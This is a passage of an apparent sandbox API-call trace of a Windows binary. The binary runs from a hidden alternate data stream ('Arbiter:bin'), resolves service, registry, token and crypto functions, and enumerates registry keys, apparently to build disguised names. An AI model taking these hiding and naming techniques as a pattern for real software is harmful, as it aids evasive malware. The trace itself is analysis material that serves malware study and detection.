GetProcAddress (hModule=0x772f0000, lpProcName="StrToIntExW") returned 0x77320196 [0032.204] GetProcAddress (hModule=0x772f0000, lpProcName="StrTrimW") returned 0x773031bc [0032.204] GetProcAddress (hModule=0x772f0000, lpProcName="PathCombineW") returned 0x7730c39c [0032.204] GetProcAddress (hModule=0x772f0000, lpProcName="StrCmpNW") returned 0x77305cc4 [0032.204] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0032.204] GetProcAddress (hModule=0x772f0000, lpProcName="StrChrW") returned 0x77304640 [0032.204] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0032.204] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0032.204] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0032.204] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0032.204] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0032.204] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0032.204] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExW") returned 0x76d5d50f [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileAttributesW") returned 0x76d5d4f7 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0032.205] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0032.206] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForMultipleObjects") returned 0x76d44220 [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryW") returned 0x76d45611 [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0032.207] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="QueryDosDeviceW") returned 0x76d6ceec [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsW") returned 0x76dc436f [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceFrequency") returned 0x76d441f0 [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathW") returned 0x76d5d4dc [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0032.208] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0032.209] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0032.209] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0032.209] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempFileNameW") returned 0x76d6d1b6 [0032.209] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0032.209] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileTime") returned 0x76d5ecbb [0032.209] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryW") returned 0x76d443e2 [0032.209] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0032.209] GetProcAddress (hModule=0x77710000, lpProcName="CreateServiceW") returned 0x7773712c [0032.209] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyW") returned 0x7772445b [0032.209] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0032.209] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0032.209] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0032.209] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthority") returned 0x77720e24 [0032.209] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthorityCount") returned 0x77720e0c [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="SetServiceStatus") returned 0x7771c7a6 [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteValueW") returned 0x7771cf31 [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="DeleteService") returned 0x7773715c [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="StartServiceW") returned 0x77717974 [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x7771a97d [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatusEx") returned 0x7771798c [0032.210] GetProcAddress (hModule=0x77710000, lpProcName="StartServiceCtrlDispatcherW") returned 0x7771a965 [0032.211] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0032.211] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x759d0000 [0032.211] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0032.211] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0032.211] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0032.214] GetProcAddress (hModule=0x76620000, lpProcName="CreateStreamOnHGlobal") returned 0x7664363b [0032.214] VirtualProtect (in: lpAddress=0x401000, dwSize=0x77c7, flNewProtect=0x1a0160, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0032.250] VirtualProtect (in: lpAddress=0x409000, dwSize=0xe90, flNewProtect=0x1a0140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0032.251] VirtualProtect (in: lpAddress=0x40a000, dwSize=0x658, flNewProtect=0x1a0148, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0032.251] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x4658, flNewProtect=0x1a0140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0032.251] VirtualProtect (in: lpAddress=0x410000, dwSize=0x938, flNewProtect=0x1a0140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0032.252] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0032.252] GetProcessHeap () returned 0x260000 [0032.253] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x4681) returned 0x2787e8 [0032.275] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0xbc96ece0, dwHighDateTime=0x1d64ac6)) [0032.276] QueryPerformanceFrequency (in: lpFrequency=0x18ff64 | out: lpFrequency=0x18ff64*=100000000) returned 1 [0032.307] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=15293163183) returned 1 [0032.308] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xbc [0032.308] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0032.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x208) returned 0x27ce78 [0032.309] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x27ce78, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\arbiter:bin")) returned 0x39 [0032.309] StrRChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter:bin", lpEnd=0x0, wMatch=0x5c) returned="\\Arbiter:bin" [0032.309] lstrlenW (lpString="Arbiter:bin") returned 11 [0032.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x277e50 [0032.309] PathFindExtensionW (pszPath="Arbiter:bin") returned="" [0032.309] StrChrW (lpStart="Arbiter:bin", wMatch=0x3a) returned=":bin" [0032.309] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x75590000 [0032.338] GetProcAddress (hModule=0x75590000, lpProcName="MiniDumpWriteDump") returned 0x755d5d38 [0032.338] lstrlenW (lpString="Arbiter") returned 7 [0032.338] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x26 [0032.338] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x64) returned 0x27d888 [0032.338] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x27d888, nSize=0x26 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x26 [0032.338] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpString2="Arbiter" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Arbiter") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Arbiter" [0032.338] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Arbiter", lpString2=".dmp" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Arbiter.dmp") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Arbiter.dmp" [0032.339] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Arbiter.dmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\arbiter.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc0 [0032.340] SetFilePointer (in: hFile=0xc0, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0032.340] SetEndOfFile (hFile=0xc0) returned 1 [0032.341] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40416a) returned 0x0 [0032.341] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x18ff88 | out: phkResult=0x18ff88*=0xc4) returned 0x0 [0032.341] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x0, lpName=0x18fd58, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0032.341] lstrlenW (lpString="ACPI") returned 4 [0032.341] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x277ed0 [0032.341] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1, lpName=0x18fd58, cchName=0x104 | out: lpName="AGP") returned 0x0 [0032.341] lstrlenW (lpString="AGP") returned 3 [0032.341] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x277ef0 [0032.342] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2, lpName=0x18fd58, cchName=0x104 | out: lpName="AppID") returned 0x0 [0032.342] lstrlenW (lpString="AppID") returned 5 [0032.342] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x277f10 [0032.342] lstrcmpW (lpString1="agp", lpString2="app") returned -1 [0032.344] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x277f50 [0032.344] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3, lpName=0x18fd58, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0032.344] lstrlenW (lpString="Arbiters") returned 8 [0032.345] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d0f0 [0032.345] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4, lpName=0x18fd58, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0032.345] lstrlenW (lpString="BackupRestore") returned 13 [0032.345] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d118 [0032.345] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d140 [0032.345] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x5, lpName=0x18fd58, cchName=0x104 | out: lpName="Class") returned 0x0 [0032.345] lstrlenW (lpString="Class") returned 5 [0032.345] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x277f70 [0032.345] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x6, lpName=0x18fd58, cchName=0x104 | out: lpName="CMF") returned 0x0 [0032.345] lstrlenW (lpString="CMF") returned 3 [0032.345] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x277f90 [0032.345] lstrcmpW (lpString1="agp", lpString2="cmf") returned -1 [0032.345] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0032.345] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x7, lpName=0x18fd58, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0032.345] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0032.345] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x277fb0 [0032.345] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0032.345] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d168 [0032.345] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0032.345] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x22) returned 0x276688 [0032.345] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x8, lpName=0x18fd58, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0032.345] lstrlenW (lpString="COM Name Arbiter") returned 16 [0032.345] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x277fd0 [0032.345] lstrcmpW (lpString1="agp", lpString2="com") returned -1 [0032.345] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0032.345] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0032.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x277ff0 [0032.346] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0032.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d190 [0032.346] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0032.346] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x9, lpName=0x18fd58, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0032.346] lstrlenW (lpString="ComputerName") returned 12 [0032.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d1b8 [0032.346] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0032.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x278010 [0032.346] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0032.346] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0032.346] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x278010 | out: hHeap=0x260000) returned 1 [0032.346] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xa, lpName=0x18fd58, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0032.346] lstrlenW (lpString="ContentIndex") returned 12 [0032.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d1e0 [0032.346] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0032.346] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0032.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278010 [0032.346] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0032.346] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xb, lpName=0x18fd58, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0032.346] lstrlenW (lpString="CrashControl") returned 12 [0032.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278030 [0032.346] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0032.346] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0032.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d208 [0032.346] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0032.346] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0032.347] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0032.347] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xc, lpName=0x18fd58, cchName=0x104 | out: lpName="CriticalDeviceDatabase") returned 0x0 [0032.347] lstrlenW (lpString="CriticalDeviceDatabase") returned 22 [0032.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d230 [0032.347] lstrcmpW (lpString1="arbiters", lpString2="critical") returned -1 [0032.347] lstrcmpW (lpString1="computer", lpString2="critical") returned -1 [0032.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d258 [0032.347] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0032.347] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0032.347] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27d258 | out: hHeap=0x260000) returned 1 [0032.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d258 [0032.347] lstrcmpW (lpString1="arbiters", lpString2="database") returned -1 [0032.347] lstrcmpW (lpString1="computer", lpString2="database") returned -1 [0032.347] lstrcmpW (lpString1="critical", lpString2="database") returned -1 [0032.347] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xd, lpName=0x18fd58, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0032.347] lstrlenW (lpString="Cryptography") returned 12 [0032.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x26) returned 0x27dea0 [0032.347] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xe, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0032.347] lstrlenW (lpString="DeviceClasses") returned 13 [0032.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d280 [0032.347] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0032.347] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0032.347] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27d280 | out: hHeap=0x260000) returned 1 [0032.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d280 [0032.347] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0032.347] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0032.347] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0032.347] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0032.348] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xf, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0032.348] lstrlenW (lpString="DeviceOverrides") returned 15 [0032.348] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d2a8 [0032.348] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0032.348] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0032.348] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27d2a8 | out: hHeap=0x260000) returned 1 [0032.348] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x27d2a8 [0032.348] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x10, lpName=0x18fd58, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0032.348] lstrlenW (lpString="Diagnostics") returned 11 [0032.348] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x24) returned 0x27ded0 [0032.348] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x11, lpName=0x18fd58, cchName=0x104 | out: lpName="Els") returned 0x0 [0032.348] lstrlenW (lpString="Els") returned 3 [0032.348] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278050 [0032.348] lstrcmpW (lpString1="agp", lpString2="els") returned -1 [0032.348] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0032.348] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0032.348] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0032.348] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x12, lpName=0x18fd58, cchName=0x104 | out: lpName="Errata") returned 0x0 [0032.348] lstrlenW (lpString="Errata") returned 6 [0032.348] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d2d0 [0032.348] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0032.348] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0032.348] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x13, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0032.348] lstrlenW (lpString="FileSystem") returned 10 [0032.348] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x278070 [0032.348] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0032.349] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0032.349] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d2f8 [0032.349] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0032.349] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0032.349] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0032.349] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x14, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0032.349] lstrlenW (lpString="FileSystemUtilities") returned 19 [0032.349] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x278090 [0032.349] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0032.349] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0032.349] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0032.349] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x278090 | out: hHeap=0x260000) returned 1 [0032.349] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d320 [0032.349] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0032.349] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0032.349] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0032.349] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0032.349] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27d320 | out: hHeap=0x260000) returned 1 [0032.349] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x27d320 [0032.349] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0032.349] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x15, lpName=0x18fd58, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0032.350] lstrlenW (lpString="GraphicsDrivers") returned 15 [0032.350] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d348 [0032.350] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0032.350] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0032.350] lstrcmpW (lpString1="critical", lpString2="graphics") returned -1 [0032.350] lstrcmpW (lpString1="database", lpString2="graphics") returned -1 [0032.350] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d370 [0032.350] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0032.350] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0032.350] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0032.350] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0032.350] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0032.350] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x16, lpName=0x18fd58, cchName=0x104 